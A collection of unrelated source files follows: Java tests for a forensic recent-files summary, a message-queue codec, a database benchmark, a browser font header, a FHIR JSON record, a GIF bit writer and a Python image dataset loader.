Assert.assertEquals(dateTimeRetriever.apply(i), results.get(i).getDateAsLong());
Assert.assertEquals(pathRetriever.apply(i), results.get(i).getPath());
Assert.assertEquals(domainRetriever.apply(i), results.get(i).getWebDomain());
}
}
}
@Test
public void getRecentDownloads_uniquePaths() throws SleuthkitCaseProviderException, TskCoreException {
DataSource dataSource = TskMockUtils.getDataSource(1);
BlackboardArtifact item1 = getRecentDownloadArtifact(dataSource, 1001, DAY_SECONDS, "domain1.com", "/a/path1");
BlackboardArtifact item1a = getRecentDownloadArtifact(dataSource, 10011, DAY_SECONDS + 1, "domain1.com", "/a/path1");
BlackboardArtifact item2 = getRecentDownloadArtifact(dataSource, 1002, DAY_SECONDS + 2, "domain2.com", "/a/path1");
BlackboardArtifact item3 = getRecentDownloadArtifact(dataSource, 1003, DAY_SECONDS + 3, "domain2a.com", "/a/path1");
List<BlackboardArtifact> artifacts = Arrays.asList(item2, item3, item1);
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
// call method
List<RecentDownloadDetails> results = summary.getRecentDownloads(dataSource, 10);
// verify results
Assert.assertNotNull(results);
Assert.assertEquals(1, results.size());
Assert.assertEquals((Long) (DAY_SECONDS + 3), results.get(0).getDateAsLong());
Assert.assertTrue("/a/path1".equalsIgnoreCase(results.get(0).getPath()));
Assert.assertTrue("domain2a.com".equalsIgnoreCase(results.get(0).getWebDomain()));
}
@Test
public void getRecentDownloads_filtersMissingData() throws SleuthkitCaseProviderException, TskCoreException {
DataSource dataSource = TskMockUtils.getDataSource(1);
BlackboardArtifact successItem = getRecentDownloadArtifact(dataSource, 1001, DAY_SECONDS, "domain1.com", "/a/path1");
BlackboardArtifact nullTime = getRecentDownloadArtifact(dataSource, 1002, null, "domain2.com", "/a/path2");
BlackboardArtifact zeroTime = getRecentDownloadArtifact(dataSource, 10021, 0L, "domain2a.com", "/a/path2a");
List<BlackboardArtifact> artifacts = Arrays.asList(nullTime, zeroTime, successItem);
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
// call method
List<RecentDownloadDetails> results = summary.getRecentDownloads(dataSource, 10);
// verify results
Assert.assertNotNull(results);
Assert.assertEquals(1, results.size());
Assert.assertEquals((Long) DAY_SECONDS, results.get(0).getDateAsLong());
Assert.assertTrue("/a/path1".equalsIgnoreCase(results.get(0).getPath()));
}
/**
* getRecentAttachments method has special setup conditions. This class
* encapsulates all the SleuthkitCase/BlackboardArtifact setup for on
* possible return item.
*/
private class AttachmentArtifactItem {
private final Integer messageArtifactTypeId;
private final boolean associatedAttrFormed;
private final String emailFrom;
private final Long messageTime;
private final boolean isParent;
private final String fileParentPath;
private final String fileName;
/**
* Constructor with all parameters.
*
* @param messageArtifactTypeId The type id for the artifact or null if
* no message artifact to be created.
* @param emailFrom Who the message is from or null not to include
* attribute.
* @param messageTime Time in seconds from epoch or null not to include
* attribute.
* @param fileParentPath The parent AbstractFile's path value.
* @param fileName The parent AbstractFile's filename value.
* @param associatedAttrFormed If false, the TSK_ASSOCIATED_OBJECT
* artifact has no attribute (even though it is required).
* @param hasParent Whether or not the artifact has a parent
* AbstractFile.
*/
AttachmentArtifactItem(Integer messageArtifactTypeId, String emailFrom, Long messageTime,
String fileParentPath, String fileName,
boolean associatedAttrFormed, boolean hasParent) {
this.messageArtifactTypeId = messageArtifactTypeId;
this.associatedAttrFormed = associatedAttrFormed;
this.emailFrom = emailFrom;
this.messageTime = messageTime;
this.isParent = hasParent;
this.fileParentPath = fileParentPath;
this.fileName = fileName;
}
/**
* Convenience constructor where defaults of required attributes and
* SleuthkitCase assumed.
*
* @param messageArtifactTypeId The type id for the artifact or null if
* no message artifact to be created.
* @param emailFrom Who the message is from or null not to include
* attribute.
* @param messageTime Time in seconds from epoch or null not to include
* attribute.
* @param fileParentPath The parent AbstractFile's path value.
* @param fileName The parent AbstractFile's filename value.
*/
AttachmentArtifactItem(Integer messageArtifactTypeId, String emailFrom, Long messageTime, String fileParentPath, String fileName) {
this(messageArtifactTypeId, emailFrom, messageTime, fileParentPath, fileName, true, true);
}
boolean isAssociatedAttrFormed() {
return associatedAttrFormed;
}
String getEmailFrom() {
return emailFrom;
}
Long getMessageTime() {
return messageTime;
}
boolean hasParent() {
return isParent;
}
String getFileParentPath() {
return fileParentPath;
}
String getFileName() {
return fileName;
}
Integer getMessageArtifactTypeId() {
return messageArtifactTypeId;
}
}
/**
* Sets up the associated artifact message for the TSK_ASSOCIATED_OBJECT.
*
* @param artifacts The mapping of artifact id to artifact.
* @param item The record to setup.
* @param dataSource The datasource.
* @param associatedId The associated attribute id.
* @param artifactId The artifact id.
*
* @return The associated Artifact blackboard attribute.
*
* @throws TskCoreException
*/
private BlackboardAttribute setupAssociatedMessage(Map<Long, BlackboardArtifact> artifacts, AttachmentArtifactItem item,
DataSource dataSource, Long associatedId, Long artifactId) throws TskCoreException {
BlackboardAttribute associatedAttr = TskMockUtils.getAttribute(ATTRIBUTE_TYPE.TSK_ASSOCIATED_ARTIFACT, associatedId);
if (item.getMessageArtifactTypeId() == null) {
return associatedAttr;
}
// find the artifact type or null if not found
ARTIFACT_TYPE messageType = Stream.of(ARTIFACT_TYPE.values())
.filter((artType) -> artType.getTypeID() == item.getMessageArtifactTypeId())
.findFirst()
.orElse(null);
// if there is a message type, create the artifact
if (messageType != null) {
List<BlackboardAttribute> attributes = new ArrayList<>();
if (item.getEmailFrom() != null) {
attributes.add(TskMockUtils.getAttribute(ATTRIBUTE_TYPE.TSK_EMAIL_FROM, item.getEmailFrom()));
}
if (item.getMessageTime() != null) {
attributes.add(TskMockUtils.getAttribute(ATTRIBUTE_TYPE.TSK_DATETIME_SENT, item.getMessageTime()));
}
artifacts.put(associatedId, TskMockUtils.getArtifact(
new BlackboardArtifact.Type(messageType), artifactId, dataSource, attributes));
}
return associatedAttr;
}
/**
* Since getRecentAttachments does not simply query one type of artifact and
* return results, this method sets up a mock SleuthkitCase and Blackboard
* to return pertinent data.
*
* @param items Each attachment item where each item could represent a
* return result if fully formed.
*
* @return The mock SleuthkitCase and Blackboard.
*/
private Pair<SleuthkitCase, Blackboard> getRecentAttachmentArtifactCase(List<AttachmentArtifactItem> items) {
SleuthkitCase skCase = mock(SleuthkitCase.class);
Blackboard blackboard = mock(Blackboard.class);
when(skCase.getBlackboard()).thenReturn(blackboard);
DataSource dataSource = TskMockUtils.getDataSource(1);
long objIdCounter = 100;
Map<Long, BlackboardArtifact> artifacts = new HashMap<>();
try {
for (AttachmentArtifactItem item : items) {
BlackboardAttribute associatedAttr = null;
// if the associated attribute is fully formed,
// create the associated attribute and related artifact
if (item.isAssociatedAttrFormed()) {
associatedAttr = setupAssociatedMessage(artifacts, item, dataSource, ++objIdCounter, ++objIdCounter);
}
// create the content parent for the associated object if one should be present
Content parent = (item.hasParent())
? TskMockUtils.getAbstractFile(++objIdCounter, item.getFileParentPath(), item.getFileName())
: null;
Long associatedId = ++objIdCounter;
artifacts.put(associatedId, TskMockUtils.getArtifact(
new BlackboardArtifact.Type(ARTIFACT_TYPE.TSK_ASSOCIATED_OBJECT),
parent, associatedId, dataSource, associatedAttr));
}
// set up the blackboard to return artifacts that match the type id.
when(blackboard.getArtifacts(anyInt(), anyLong())).thenAnswer((inv) -> {
Object[] args = inv.getArguments();
int artifactType = (Integer) args[0];
return artifacts.values().stream()
.filter(art -> art.getArtifactTypeID() == artifactType)
.collect(Collectors.toList());
});
// also set up the sleuthkitcase to return the artifact with the matching id or null.
when(skCase.getBlackboardArtifact(anyLong())).thenAnswer((inv2) -> {
Object[] args2 = inv2.getArguments();
long id = (Long) args2[0];
return artifacts.get(id);
});
return Pair.of(skCase, blackboard);
} catch (TskCoreException ex) {
fail("There was an error while creating SleuthkitCase for getRecentAttachments");
return null;
}
}
@Test
public void getRecentAttachments_sortedByDateTimeAndLimited() throws SleuthkitCaseProviderException, TskCoreException {
DataSource dataSource = TskMockUtils.getDataSource(1);
// a deterministic means of transforming an index into a particular attribute type so that they can be created
// and compared on return
Function<Integer, String> emailFromRetriever = (idx) -> String.format("<EMAIL>", idx);
Function<Integer, String> pathRetriever = (idx) -> "/path/to/attachment/" + idx;
Function<Integer, String> fileNameRetriever = (idx) -> String.format("%d-filename.png", idx);
int countRequest = 10;
for (int countToGenerate : new int[]{1, 9, 10, 11}) {
// set up the items in the sleuthkit case
List<AttachmentArtifactItem> items = IntStream.range(0, countToGenerate)
.mapToObj((idx) -> new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_MESSAGE.getTypeID(),
emailFromRetriever.apply(idx), dateTimeRetriever.apply(idx),
pathRetriever.apply(idx), fileNameRetriever.apply(idx)))
.collect(Collectors.toList());
List<AttachmentArtifactItem> mixedUpItems = RandomizationUtils.getMixedUp(items);
Pair<SleuthkitCase, Blackboard> casePair = getRecentAttachmentArtifactCase(mixedUpItems);
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
// retrieve results
List<RecentAttachmentDetails> results = summary.getRecentAttachments(dataSource, countRequest);
// verify results
int expectedCount = Math.min(countRequest, countToGenerate);
Assert.assertNotNull(results);
Assert.assertEquals(expectedCount, results.size());
for (int i = 0; i < expectedCount; i++) {
RecentAttachmentDetails result = results.get(i);
Assert.assertEquals(dateTimeRetriever.apply(i), result.getDateAsLong());
Assert.assertTrue(emailFromRetriever.apply(i).equalsIgnoreCase(result.getSender()));
Assert.assertTrue(Paths.get(pathRetriever.apply(i), fileNameRetriever.apply(i)).toString()
.equalsIgnoreCase(result.getPath()));
}
}
}
@Test
public void getRecentAttachments_filterData() throws SleuthkitCaseProviderException, TskCoreException {
// setup data
DataSource dataSource = TskMockUtils.getDataSource(1);
AttachmentArtifactItem successItem = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
"<EMAIL>", DAY_SECONDS, "/parent/path", "msg.pdf");
AttachmentArtifactItem successItem2 = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_MESSAGE.getTypeID(),
"person_on_skype", DAY_SECONDS + 1, "/parent/path/to/skype", "skype.png");
AttachmentArtifactItem wrongArtType = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_CALLLOG.getTypeID(),
"5555675309", DAY_SECONDS + 2, "/path/to/callog/info", "callog.dat");
AttachmentArtifactItem missingTimeStamp = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
"<EMAIL>", null, "/parent/path", "msg2.pdf");
AttachmentArtifactItem zeroTimeStamp = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
"<EMAIL>", 0L, "/parent/path", "msg2a.png");
AttachmentArtifactItem noParentFile = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
"<EMAIL>", DAY_SECONDS + 4, "/parent/path", "msg4.jpg", true, false);
AttachmentArtifactItem noAssocAttr = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
"<EMAIL>", DAY_SECONDS + 5, "/parent/path", "msg5.gif", false, true);
AttachmentArtifactItem missingAssocArt = new AttachmentArtifactItem(null,
"<EMAIL>", DAY_SECONDS + 6, "/parent/path", "msg6.pdf");
List<AttachmentArtifactItem> items = Arrays.asList(successItem, successItem2,
wrongArtType, missingTimeStamp, zeroTimeStamp,
noParentFile, noAssocAttr, missingAssocArt);
Pair<SleuthkitCase, Blackboard> casePair = getRecentAttachmentArtifactCase(items);
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
// get data
List<RecentAttachmentDetails> results = summary.getRecentAttachments(dataSource, 10);
// verify results
Assert.assertNotNull(results);
Assert.assertEquals(2, results.size());
RecentAttachmentDetails successItem2Details = results.get(0);
RecentAttachmentDetails successItemDetails = results.get(1);
Assert.assertEquals(successItemDetails.getDateAsLong(), (Long) DAY_SECONDS);
Assert.assertTrue(Paths.get(successItem.getFileParentPath(), successItem.getFileName())
.toString().equalsIgnoreCase(successItemDetails.getPath()));
Assert.assertTrue(successItem.getEmailFrom().equalsIgnoreCase(successItemDetails.getSender()));
Assert.assertEquals(successItem2Details.getDateAsLong(), (Long) (DAY_SECONDS + 1));
Assert.assertTrue(Paths.get(successItem2.getFileParentPath(), successItem2.getFileName())
.toString().equalsIgnoreCase(successItem2Details.getPath()));
Assert.assertTrue(successItem2.getEmailFrom().equalsIgnoreCase(successItem2Details.getSender()));
}
@Test
public void getRecentAttachments_uniquePath() throws SleuthkitCaseProviderException, TskCoreException {
// setup data
DataSource dataSource = TskMockUtils.getDataSource(1);
AttachmentArtifactItem item1 = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
"<EMAIL>", DAY_SECONDS, "/parent/path", "msg.pdf");
AttachmentArtifactItem item2 = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_MESSAGE.getTypeID(),
"person_on_skype", DAY_SECONDS + 1, "/parent/path", "msg.pdf");
AttachmentArtifactItem item3 = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
"<EMAIL>", DAY_SECONDS + 2, "/parent/path", "msg.pdf");
List<AttachmentArtifactItem> items = Arrays.asList(item1, item2, item3);
Pair<SleuthkitCase, Blackboard> casePair = getRecentAttachmentArtifactCase(items);
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
// get data
List<RecentAttachmentDetails> results = summary.getRecentAttachments(dataSource, 10);
// verify results
Assert.assertNotNull(results);
Assert.assertEquals(1, results.size());
Assert.assertEquals(results.get(0).getDateAsLong(), (Long) (DAY_SECONDS + 2));
Assert.assertTrue(Paths.get(item3.getFileParentPath(), item3.getFileName())
.toString().equalsIgnoreCase(results.get(0).getPath()));
Assert.assertTrue(results.get(0).getSender().equalsIgnoreCase(item3.getEmailFrom()));
}
}
| 14,255 |
311 | /**
* Copyright 2019 The JoyQueue Authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.joyqueue.network.codec;
import org.joyqueue.domain.Subscription;
import org.joyqueue.domain.TopicName;
import org.joyqueue.network.command.CommandType;
import org.joyqueue.network.command.UnSubscribe;
import org.joyqueue.network.serializer.Serializer;
import org.joyqueue.network.transport.codec.PayloadCodec;
import org.joyqueue.network.transport.command.Header;
import org.joyqueue.network.transport.command.Type;
import io.netty.buffer.ByteBuf;
import java.util.ArrayList;
import java.util.List;
/**
* @author wylixiaobin
* Date: 2018/10/16
*/
public class UnSubscribeCodec implements PayloadCodec<Header, UnSubscribe>, Type {
@Override
public Object decode(Header header, ByteBuf buffer) throws Exception {
Short subscriptionSize = buffer.readShort();
List<Subscription> subscriptions = new ArrayList();
if (subscriptionSize > 0) {
for (int i = 0; i < subscriptionSize; i++) {
TopicName topic = TopicName.parse(Serializer.readString(buffer));
String app = Serializer.readString(buffer);
Subscription.Type type = Subscription.Type.valueOf(buffer.readByte());
subscriptions.add(new Subscription(topic, app, type));
}
}
return new UnSubscribe().subscriptions(subscriptions);
}
@Override
public void encode(UnSubscribe payload, ByteBuf buffer) throws Exception {
List<Subscription> subscriptions = payload.getSubscriptions();
int subscriptionSize = subscriptions == null ? 0 : subscriptions.size();
buffer.writeShort(subscriptionSize);
if (subscriptionSize > 0) {
for (Subscription subscription : subscriptions) {
Serializer.write(subscription.getTopic().getFullName(), buffer);
Serializer.write(subscription.getApp(), buffer);
buffer.writeByte(subscription.getType().getValue());
}
}
}
@Override
public int type() {
return CommandType.UNSUBSCRIBE;
}
}
| 924 |
3,066 | <reponame>skofra0/crate<gh_stars>1000+
/*
* Licensed to Crate.io GmbH ("Crate") under one or more contributor
* license agreements. See the NOTICE file distributed with this work for
* additional information regarding copyright ownership. Crate licenses
* this file to you under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License. You may
* obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* However, if you have executed another commercial license agreement
* with Crate these terms will supersede the license and you may use the
* software solely pursuant to the terms of the relevant commercial agreement.
*/
package io.crate.execution.engine.aggregation;
import java.util.Collections;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.function.BiConsumer;
import java.util.function.Function;
import java.util.stream.Collectors;
import java.util.stream.IntStream;
import org.elasticsearch.Version;
import org.elasticsearch.common.inject.ModulesBuilder;
import org.openjdk.jmh.annotations.Benchmark;
import org.openjdk.jmh.annotations.BenchmarkMode;
import org.openjdk.jmh.annotations.Mode;
import org.openjdk.jmh.annotations.OutputTimeUnit;
import org.openjdk.jmh.annotations.Scope;
import org.openjdk.jmh.annotations.Setup;
import org.openjdk.jmh.annotations.State;
import io.crate.breaker.RamAccounting;
import io.crate.data.Input;
import io.crate.data.Row;
import io.crate.data.Row1;
import io.crate.execution.engine.aggregation.impl.AggregationImplModule;
import io.crate.execution.engine.aggregation.impl.SumAggregation;
import io.crate.execution.engine.collect.InputCollectExpression;
import io.crate.expression.symbol.AggregateMode;
import io.crate.expression.symbol.Literal;
import io.crate.memory.OnHeapMemoryManager;
import io.crate.metadata.Functions;
import io.crate.metadata.functions.Signature;
import io.crate.types.DataTypes;
@BenchmarkMode(Mode.AverageTime)
@OutputTimeUnit(TimeUnit.MICROSECONDS)
@State(Scope.Benchmark)
public class AggregateCollectorBenchmark {
private final List<Row> rows = IntStream.range(0, 10_000).mapToObj(Row1::new).collect(Collectors.toList());
private AggregateCollector collector;
@Setup
public void setup() {
InputCollectExpression inExpr0 = new InputCollectExpression(0);
Functions functions = new ModulesBuilder()
.add(new AggregationImplModule())
.createInjector()
.getInstance(Functions.class);
SumAggregation<?> sumAggregation = (SumAggregation<?>) functions.getQualified(
Signature.aggregate(
SumAggregation.NAME,
DataTypes.INTEGER.getTypeSignature(),
DataTypes.LONG.getTypeSignature()
),
List.of(DataTypes.INTEGER),
DataTypes.INTEGER
);
var memoryManager = new OnHeapMemoryManager(bytes -> {});
collector = new AggregateCollector(
Collections.singletonList(inExpr0),
RamAccounting.NO_ACCOUNTING,
memoryManager,
Version.CURRENT,
AggregateMode.ITER_FINAL,
new AggregationFunction[] { sumAggregation },
Version.CURRENT,
new Input[][] { {inExpr0 } },
new Input[] { Literal.BOOLEAN_TRUE }
);
}
@Benchmark
public Iterable<Row> measureAggregateCollector() {
Object[] state = collector.supplier().get();
BiConsumer<Object[], Row> accumulator = collector.accumulator();
Function<Object[], Iterable<Row>> finisher = collector.finisher();
for (int i = 0; i < rows.size(); i++) {
accumulator.accept(state, rows.get(i));
}
return finisher.apply(state);
}
}
| 1,511 |
777 | <gh_stars>100-1000
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef FontFallbackPriority_h
#define FontFallbackPriority_h
namespace blink {
// http://unicode.org/reports/tr51/#Presentation_Style discusses the differences
// between emoji in text and the emoji in emoji presentation. In that sense, the
// EmojiEmoji wording is taken from there. Also compare
// http://unicode.org/Public/emoji/1.0/emoji-data.txt
enum class FontFallbackPriority {
// For regular non-symbols text,
// normal text fallback in FontFallbackIterator
Text,
// For emoji in text presentaiton
EmojiText,
// For emoji in emoji presentation
EmojiEmoji,
Invalid
};
bool isNonTextFallbackPriority(FontFallbackPriority);
}; // namespace blink
#endif
| 261 |
648 | <filename>spec/hl7.fhir.core/1.0.2/package/DataElement-Immunization.explanation.json<gh_stars>100-1000
{"resourceType":"DataElement","id":"Immunization.explanation","meta":{"lastUpdated":"2015-10-24T07:41:03.495+11:00"},"url":"http://hl7.org/fhir/DataElement/Immunization.explanation","status":"draft","experimental":true,"stringency":"fully-specified","element":[{"path":"Immunization.explanation","short":"Administration/non-administration reasons","definition":"Reasons why a vaccine was or was not administered.","min":0,"max":"1","type":[{"code":"BackboneElement"}],"mapping":[{"identity":"rim","map":"n/a"}]}]} | 191 |
543 | <gh_stars>100-1000
/*
* Copyright (c) 2005, 2018, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package com.sun.imageio.plugins.common;
import java.io.IOException;
import javax.imageio.stream.ImageOutputStream;
/*
* Came from GIFEncoder initially.
* Modified - to allow for output compressed data without the block counts
* which breakup the compressed data stream for GIF.
*/
public class BitFile {
ImageOutputStream output;
byte[] buffer;
int index;
int bitsLeft; // bits left at current index that are avail.
/** note this also indicates gif format BITFile. **/
boolean blocks = false;
/*
* @param output destination for output data
* @param blocks GIF LZW requires block counts for output data
*/
public BitFile(ImageOutputStream output, boolean blocks) {
this.output = output;
this.blocks = blocks;
buffer = new byte[256];
index = 0;
bitsLeft = 8;
}
public void flush() throws IOException {
int numBytes = index + (bitsLeft == 8 ? 0 : 1);
if (numBytes > 0) {
if (blocks) {
output.write(numBytes);
}
output.write(buffer, 0, numBytes);
buffer[0] = 0;
index = 0;
bitsLeft = 8;
}
}
public void writeBits(int bits, int numbits) throws IOException {
int bitsWritten = 0;
int numBytes = 255; // gif block count
do {
// This handles the GIF block count stuff
if ((index == 254 && bitsLeft == 0) || index > 254) {
if (blocks) {
output.write(numBytes);
}
output.write(buffer, 0, numBytes);
buffer[0] = 0;
index = 0;
bitsLeft = 8;
}
if (numbits <= bitsLeft) { // bits contents fit in current index byte
if (blocks) { // GIF
buffer[index] |= (bits & ((1 << numbits) - 1)) << (8 - bitsLeft);
bitsWritten += numbits;
bitsLeft -= numbits;
numbits = 0;
} else {
buffer[index] |= (bits & ((1 << numbits) - 1)) << (bitsLeft - numbits);
bitsWritten += numbits;
bitsLeft -= numbits;
numbits = 0;
}
} else { // bits overflow from current byte to next.
if (blocks) { // GIF
// if bits > space left in current byte then the lowest order bits
// of code are taken and put in current byte and rest put in next.
buffer[index] |= (bits & ((1 << bitsLeft) - 1)) << (8 - bitsLeft);
bitsWritten += bitsLeft;
bits >>= bitsLeft;
numbits -= bitsLeft;
buffer[++index] = 0;
bitsLeft = 8;
} else {
// if bits > space left in current byte then the highest order bits
// of code are taken and put in current byte and rest put in next.
// at highest order bit location !!
int topbits = (bits >>> (numbits - bitsLeft)) & ((1 << bitsLeft) - 1);
buffer[index] |= topbits;
numbits -= bitsLeft; // ok this many bits gone off the top
bitsWritten += bitsLeft;
buffer[++index] = 0; // next index
bitsLeft = 8;
}
}
} while (numbits != 0);
}
}
| 2,067 |
1,338 | // Clipboard.h
#ifndef CLIPBOARD_H
#define CLIPBOARD_H
#include <String.h>
#include <Message.h>
#include <Messenger.h>
#include "WatchingService.h"
class Clipboard {
public:
Clipboard(const char *name);
~Clipboard();
void SetData(const BMessage *data, BMessenger dataSource);
const BMessage *Data() const;
BMessenger DataSource() const;
int32 Count() const;
bool AddWatcher(BMessenger watcher);
bool RemoveWatcher(BMessenger watcher);
void NotifyWatchers();
private:
BString fName;
BMessage fData;
BMessenger fDataSource;
int32 fCount;
WatchingService fWatchingService;
};
#endif // CLIPBOARD_H
| 240 |
733 | import numpy as np
try:
import mc
except Exception:
pass
import cv2
import os
from PIL import Image
import torch
from torch.utils.data import Dataset
import torchvision.transforms as transforms
import utils
from . import reader
import inference as infer
class SupCompDataset(Dataset):
def __init__(self, config, phase):
self.dataset = config['dataset']
if self.dataset == 'COCOA':
self.data_reader = reader.COCOADataset(config['{}_annot_file'.format(phase)])
else:
self.data_reader = reader.KINSLVISDataset(
self.dataset, config['{}_annot_file'.format(phase)])
self.img_transform = transforms.Compose([
transforms.Normalize(config['data_mean'], config['data_std'])
])
self.sz = config['input_size']
self.phase = phase
self.config = config
self.memcached = config.get('memcached', False)
self.initialized = False
self.memcached_client = config.get('memcached_client', None)
self.memcached = self.memcached_client is not None
def __len__(self):
return self.data_reader.get_instance_length()
def _init_memcached(self):
if not self.initialized:
assert self.memcached_client is not None, "Please specify the path of your memcached_client"
server_list_config_file = "{}/server_list.conf".format(self.memcached_client)
client_config_file = "{}/client.conf".format(self.memcached_client)
self.mclient = mc.MemcachedClient.GetInstance(server_list_config_file, client_config_file)
self.initialized = True
def _load_image(self, fn):
if self.memcached:
try:
img_value = mc.pyvector()
self.mclient.Get(fn, img_value)
img_value_str = mc.ConvertBuffer(img_value)
img = utils.pil_loader(img_value_str)
except:
print('Read image failed ({})'.format(fn))
raise Exception("Exit")
else:
return img
else:
return Image.open(fn).convert('RGB')
def _get_inst(self, idx, load_rgb=False, randshift=False):
modal, bbox, category, imgfn, amodal = self.data_reader.get_instance(idx, with_gt=True)
centerx = bbox[0] + bbox[2] / 2.
centery = bbox[1] + bbox[3] / 2.
size = max([np.sqrt(bbox[2] * bbox[3] * self.config['enlarge_box']), bbox[2] * 1.1, bbox[3] * 1.1])
if size < 5 or np.all(modal == 0):
return self._get_inst(
np.random.choice(len(self)), load_rgb=load_rgb, randshift=randshift)
# shift & scale aug
if self.phase == 'train':
if randshift:
centerx += np.random.uniform(*self.config['base_aug']['shift']) * size
centery += np.random.uniform(*self.config['base_aug']['shift']) * size
size /= np.random.uniform(*self.config['base_aug']['scale'])
# crop
new_bbox = [int(centerx - size / 2.), int(centery - size / 2.), int(size), int(size)]
modal = cv2.resize(utils.crop_padding(modal, new_bbox, pad_value=(0,)),
(self.sz, self.sz), interpolation=cv2.INTER_NEAREST)
amodal = cv2.resize(utils.crop_padding(amodal, new_bbox, pad_value=(0,)),
(self.sz, self.sz), interpolation=cv2.INTER_NEAREST)
# flip
if self.config['base_aug']['flip'] and np.random.rand() > 0.5:
flip = True
modal = modal[:, ::-1]
amodal = amodal[:, ::-1]
else:
flip = False
if load_rgb:
rgb = np.array(self._load_image(os.path.join(
self.config['{}_image_root'.format(self.phase)], imgfn))) # uint8
rgb = cv2.resize(utils.crop_padding(rgb, new_bbox, pad_value=(0,0,0)),
(self.sz, self.sz), interpolation=cv2.INTER_CUBIC)
if flip:
rgb = rgb[:, ::-1, :]
rgb = torch.from_numpy(rgb.astype(np.float32).transpose((2, 0, 1)) / 255.)
rgb = self.img_transform(rgb) # CHW
if load_rgb:
return modal, amodal, rgb
else:
return modal, amodal, None
def __getitem__(self, idx):
if self.memcached:
self._init_memcached()
modal, amodal, rgb = self._get_inst(
idx, load_rgb=self.config['load_rgb'], randshift=True) # modal, uint8 {0, 1}
if rgb is None:
rgb = torch.zeros((3, self.sz, self.sz), dtype=torch.float32) # 3HW
modal_tensor = torch.from_numpy(
modal.astype(np.float32)).unsqueeze(0) # 1HW, float
target = torch.from_numpy(amodal.astype(np.int)) # HW, int
return rgb, modal_tensor, target
class SupOrderDataset(Dataset):
def __init__(self, config, phase):
self.dataset = config['dataset']
if self.dataset == 'COCOA':
self.data_reader = reader.COCOADataset(config['{}_annot_file'.format(phase)])
else:
self.data_reader = reader.KINSLVISDataset(
self.dataset, config['{}_annot_file'.format(phase)])
self.img_transform = transforms.Compose([
transforms.Normalize(config['data_mean'], config['data_std'])
])
self.sz = config['input_size']
self.phase = phase
self.config = config
self.memcached = config.get('memcached', False)
self.initialized = False
self.memcached_client = config.get('memcached_client', None)
self.memcached = self.memcached_client is not None
def __len__(self):
return self.data_reader.get_image_length()
def _init_memcached(self):
if not self.initialized:
assert self.memcached_client is not None, "Please specify the path of your memcached_client"
server_list_config_file = "{}/server_list.conf".format(self.memcached_client)
client_config_file = "{}/client.conf".format(self.memcached_client)
self.mclient = mc.MemcachedClient.GetInstance(server_list_config_file, client_config_file)
self.initialized = True
def _load_image(self, fn):
if self.memcached:
try:
img_value = mc.pyvector()
self.mclient.Get(fn, img_value)
img_value_str = mc.ConvertBuffer(img_value)
img = utils.pil_loader(img_value_str)
except:
print('Read image failed ({})'.format(fn))
raise Exception("Exit")
else:
return img
else:
return Image.open(fn).convert('RGB')
def _get_pair(self, modal, bboxes, idx1, idx2, imgfn, load_rgb=False, randshift=False):
bbox = utils.combine_bbox(bboxes[(idx1, idx2), :] )
centerx = bbox[0] + bbox[2] / 2.
centery = bbox[1] + bbox[3] / 2.
size = max([np.sqrt(bbox[2] * bbox[3] * 2.), bbox[2] * 1.1, bbox[3] * 1.1])
# shift & scale aug
if self.phase == 'train':
if randshift:
centerx += np.random.uniform(*self.config['base_aug']['shift']) * size
centery += np.random.uniform(*self.config['base_aug']['shift']) * size
